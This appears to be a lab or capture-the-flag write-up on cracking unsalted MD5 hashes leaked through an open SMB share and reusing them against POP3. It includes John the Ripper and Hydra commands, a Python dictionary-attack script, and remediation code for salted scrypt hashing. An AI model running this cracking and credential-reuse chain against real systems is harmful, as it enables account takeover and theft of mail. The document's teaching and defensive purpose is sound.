Objective: Recover credentials leaked over an unauthenticated network share, crack the hashes offline, and reuse the plaintext passwords to authenticate to a second service (POP3).

1. The Vulnerability: Information Disclosure (Credential Leak)

The target had a critical information disclosure vulnerability: internal communication logs (emails) were readable from an SMB share that required no authentication, and one of those emails carried a dump of usernames with raw, unsalted MD5 password hashes. This is a complete loss of confidentiality for the identity store: anyone on the network could harvest it without exploiting a single service flaw.

2. Technical Execution: Offline Cracking & Credential Reuse

I used John the Ripper (JtR) to run an offline dictionary attack against the exfiltrated MD5 hashes. Because the hashes were unsalted MD5, each dictionary word costs a single hash computation for the whole dump, so recovery was fast. The plaintext passwords were then reused as the authentication vector against secondary services (POP3/IMAP), demonstrating the cascading impact of a single data leak on organizational security.

Component      | Value                       | Purpose
---------------|-----------------------------|------------------------------------------------------------
Data Source    | SMB Share (Unauthenticated) | Source of the leaked credential dump.
Hash Type      | MD5 (raw, unsalted)         | Insecure algorithm used for password storage.
Cracking Tool  | John the Ripper             | Offline recovery of plaintext passwords from the hashes.
Attack Pivot   | Hydra (POP3)                | Authenticating to the mail service with the recovered passwords.

3. Execution Workflow

  1. Information Gathering: Scanned the target for SMB (Samba) shares with Nmap and pulled the email logs from the share's public directory.
  2. Credential Extraction: Cleaned the exfiltrated data to isolate user:hash pairs in a form John accepts.
  3. Offline Cracking: Ran John the Ripper with a wordlist against the raw MD5 hashes and recovered the plaintext passwords.
  4. Service Access: Fed the recovered credentials to Hydra against the target's POP3 service to confirm which pairs grant mailbox access.
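The following is an added example, not part of the original write-up, that walks steps 2 and 3 in Python: it parses a constructed stand-in for the leaked e-mail dump into user:hash pairs, drops duplicates and malformed lines, writes the user:hash input that john --format=Raw-MD5 reads, and runs the same offline dictionary attack John performs against raw MD5 so the cheapness of unsalted hashing is visible. The e-mail text, usernames and wordlist are constructed for the demonstration; the three hashes are MD5 of well-known weak passwords. It also emits the colon-separated login:pass lines that Hydra's -C option accepts, which tries only the recovered pairs instead of every user against every password.

```python
"""Added example (not from the original write-up): turn the leaked e-mail
dump into user:hash pairs and run the offline dictionary attack John the
Ripper performs against raw (unsalted) MD5. All input is constructed."""
import hashlib
import re

# Constructed stand-in for the e-mail log pulled from the open SMB share.
# One duplicate, one upper-case hash and one malformed line are included
# on purpose to exercise the clean-up step.
LEAKED_EMAIL = """\
From: it-admin@example.internal
To: helpdesk@example.internal
Subject: FW: account export (please delete after use)

Here is the export you asked for. Format is username:md5

alice:5f4dcc3b5aa765d61d8327deb882cf99
bob:E10ADC3949BA59ABBE56E057F20F883E
carol:d8578edf8458ce06fbc5bb76a58c5ca4
alice:5f4dcc3b5aa765d61d8327deb882cf99
dave:not-a-hash
--
Sent from my phone
"""

# Constructed wordlist standing in for /usr/share/wordlists/rockyou.txt.
WORDLIST = ["letmein", "password", "123456", "qwerty", "Summer2023!"]

# A credential line is a username, a colon and exactly 32 hex characters.
HASH_LINE = re.compile(r"^([A-Za-z0-9._@-]+):([0-9a-fA-F]{32})$")


def extract_hashes(dump: str) -> dict:
    """Step 2: isolate user:hash pairs, dropping duplicates and junk lines."""
    creds = {}
    for line in dump.splitlines():
        m = HASH_LINE.match(line.strip())
        if m:
            creds[m.group(1)] = m.group(2).lower()
    return creds


def to_john_input(creds: dict) -> str:
    """Write the pairs in the user:hash form that john --format=Raw-MD5 reads."""
    return "\n".join(f"{u}:{h}" for u, h in creds.items()) + "\n"


def crack_raw_md5(creds: dict, wordlist) -> dict:
    """Step 3: dictionary attack against unsalted MD5. Each candidate is
    hashed once and looked up against every user, so the cost is one MD5
    per word for the whole dump rather than per user; this is why raw MD5
    falls in seconds."""
    by_digest = {}
    for user, digest in creds.items():
        by_digest.setdefault(digest, []).append(user)
    recovered = {}
    for candidate in wordlist:
        digest = hashlib.md5(candidate.encode()).hexdigest()
        for user in by_digest.get(digest, []):
            recovered[user] = candidate
    return recovered


def to_hydra_pairs(recovered: dict) -> list:
    """login:pass lines for hydra -C, so only the matching pairs are tried
    against POP3 instead of every user against every password."""
    return [f"{u}:{p}" for u, p in recovered.items()]


if __name__ == "__main__":
    creds = extract_hashes(LEAKED_EMAIL)
    print(to_john_input(creds), end="")
    for pair in to_hydra_pairs(crack_raw_md5(creds, WORDLIST)):
        print("cracked:", pair)
```

The regex is deliberately strict (32 hex characters only) so that commentary in the mail body such as "Format is username:md5" is never mistaken for a credential; hashes are lower-cased because John and most lookup tables expect that form.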

4. Key Commands

# Using John the Ripper to crack the exfiltrated MD5 hashes
john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Using Hydra to test the recovered credentials against the POP3 service (-L/-P tries every user against every password)
hydra -L users.txt -P cracked_passes.txt 10.10.x.x pop3

5. Evidence of Work

Discovery
Caption: Discovery phase showing the unauthenticated access to sensitive internal email logs.

Results
Caption: Results/Impact phase showing the successful recovery of multiple plaintext passwords via John the Ripper.

6. Professional Impact

This project demonstrates the full credential chain of an attack: a single misconfiguration (an unauthenticated SMB share) led directly to account takeover on an unrelated service (email over POP3) without exploiting a single software flaw. To remediate this, I recommended that the organization decommission or authenticate the open share and move password storage from unsalted MD5 to a salted, slow hash such as bcrypt or Argon2. Hashes are not decrypted but guessed, so the defence is making each guess expensive and unique per user; with that change a leaked store can no longer be cracked at the rate a fast, unsalted hash allows.
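As an added example, not from the original write-up, here is the storage change recommended above, implemented with hashlib.scrypt from the Python standard library as a stand-in for bcrypt or Argon2 (neither ships with Python; the record format and verification pattern are the same). It hashes with a random per-user salt, verifies in constant time, and then re-runs the dictionary attack against the salted store so the cost difference is visible: every candidate now needs a full KDF derivation per user instead of one MD5 per candidate shared across the whole dump. The work factors, sample users and wordlist are assumptions made for the demonstration.

```python
"""Added example (not from the original write-up): salted, memory-hard
password storage as the remediation for the raw-MD5 dump. hashlib.scrypt
stands in for bcrypt/Argon2 so the example needs only the standard library."""
import hashlib
import hmac
import os
from typing import Optional

# Work factors (assumed for the demo): N=2**14, r=8, p=1 needs about 16 MiB
# of memory per derivation, which is what makes GPU cracking expensive.
SCRYPT_N, SCRYPT_R, SCRYPT_P, DKLEN = 2 ** 14, 8, 1, 32


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Derive a record 'scrypt$N$r$p$salt$key' with a fresh 16-byte salt.
    Two users with the same password get different records."""
    salt = salt if salt is not None else os.urandom(16)
    key = hashlib.scrypt(password.encode(), salt=salt,
                         n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=DKLEN)
    return "$".join(["scrypt", str(SCRYPT_N), str(SCRYPT_R), str(SCRYPT_P),
                     salt.hex(), key.hex()])


def verify_password(password: str, record: str) -> bool:
    """Re-derive with the stored salt and parameters; compare in constant time
    so a mismatch does not leak how many bytes matched."""
    scheme, n, r, p, salt_hex, key_hex = record.split("$")
    if scheme != "scrypt":
        raise ValueError("unsupported scheme: " + scheme)
    key = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex),
                         n=int(n), r=int(r), p=int(p), dklen=len(key_hex) // 2)
    return hmac.compare_digest(key, bytes.fromhex(key_hex))


def crack_salted(store: dict, wordlist) -> tuple:
    """The same dictionary attack that broke the raw-MD5 dump, against the
    salted store. The salt forces one KDF run per (user, candidate) pair, so
    the work is per user, not per word. Returns (recovered, derivations)."""
    recovered, derivations = {}, 0
    for user, record in store.items():
        for candidate in wordlist:
            derivations += 1
            if verify_password(candidate, record):
                recovered[user] = candidate
                break
    return recovered, derivations


# Constructed sample: the same three weak passwords from the leaked dump.
SAMPLE_USERS = {"alice": "password", "bob": "123456", "carol": "qwerty"}
WORDLIST = ["letmein", "password", "123456", "qwerty", "Summer2023!"]


def build_store(users: dict) -> dict:
    """Hash each user's password the way the remediated service would store it."""
    return {u: hash_password(pw) for u, pw in users.items()}


if __name__ == "__main__":
    store = build_store(SAMPLE_USERS)
    recovered, derivations = crack_salted(store, WORDLIST)
    print(f"recovered {recovered} after {derivations} scrypt derivations")
```

The caveat a practitioner should keep in mind: the three weak passwords still fall. A salted, slow hash removes the shared-lookup shortcut and makes each guess cost milliseconds and megabytes instead of nanoseconds, which turns a seconds-long crack of a large dump into an infeasible one for strong passwords, but it does not rescue "password" or "123456". Password policy and MFA on the mail service remain necessary alongside the hashing change.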